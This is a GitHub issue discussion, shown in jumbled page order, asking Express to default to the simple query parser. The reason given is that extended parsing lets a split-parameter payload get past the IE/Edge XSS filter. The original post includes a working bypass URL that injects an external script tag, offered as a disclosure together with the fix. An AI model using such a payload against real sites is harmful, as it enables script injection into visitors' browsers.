Consider disabling extended query string parsing by default #3361
Comments
|
Yes, the plan is to disable by default in Express 5.0. You can view the 5.0 plan here: #2237
I hope this helps! I even updated the plan to reference this issues in the check list for that entry, since there wasn't a specific issue before that I recall, just discussions. |
|
Oh that's awesome! Thank you Doug! |
|
And the |
|
Everything has now been updated to default to the simple parser in the current 5.0 branch 👍 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I created a simple browser-based XSS filter test app here:
http://xss.untrusted.com/xss?id=aaa&id=bbb
This is page is simple enough that pretty much any filter bypass bug present here would be legitimate. That is, the identified bypass condition would have to be in-scope as an issue for the filter to defend against.
Masato Kinugawa was able to bypass the IE / Edge XSS filter using the following trick:
http://xss.untrusted.com/xss?id[0]=%3Cscript/&id[1]=/src=//html5sec.org/test.js%3E%3C/script%3E
This relies on the extended query string parsing that is enabled by default in express.
I was able to fix my test app by manually disabling the extended query string parsing:
app.set('query parser', 'simple');
While it's certainly not the responsibility of express to make the IE / Edge XSS Filter's job any easier, disabling the extended query parsing by default would be one way to solve this issue for the filter.
Adam Baldwin alerted me to this issue and FWIW he is also in favor of changing the default query parser to 'simple': https://twitter.com/adam_baldwin/status/884633562292428800
Disclosure: Though I'm currently employed by Google, in a previous life I worked at Microsoft developing the IE / Edge XSS Filter.
The text was updated successfully, but these errors were encountered: